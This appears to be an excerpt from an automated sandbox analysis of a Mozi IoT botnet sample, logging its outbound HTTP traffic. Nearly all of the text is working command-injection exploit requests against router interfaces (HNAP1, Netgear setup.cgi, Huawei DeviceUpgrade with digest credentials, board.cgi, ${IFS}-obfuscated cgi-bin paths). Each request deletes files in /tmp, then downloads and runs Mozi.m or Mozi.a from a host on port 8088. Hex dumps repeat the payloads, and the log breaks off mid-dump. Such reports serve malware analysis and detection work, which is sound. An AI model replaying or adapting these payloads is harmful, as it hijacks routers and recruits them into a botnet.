                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 124.254.92.211:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 139.246.211.115:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 37.149.244.225:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 203.211.100.123:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 123.199.243.38:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 111.4.180.69:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 217.15.207.28:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 180.113.188.93:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 66.197.17.76:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 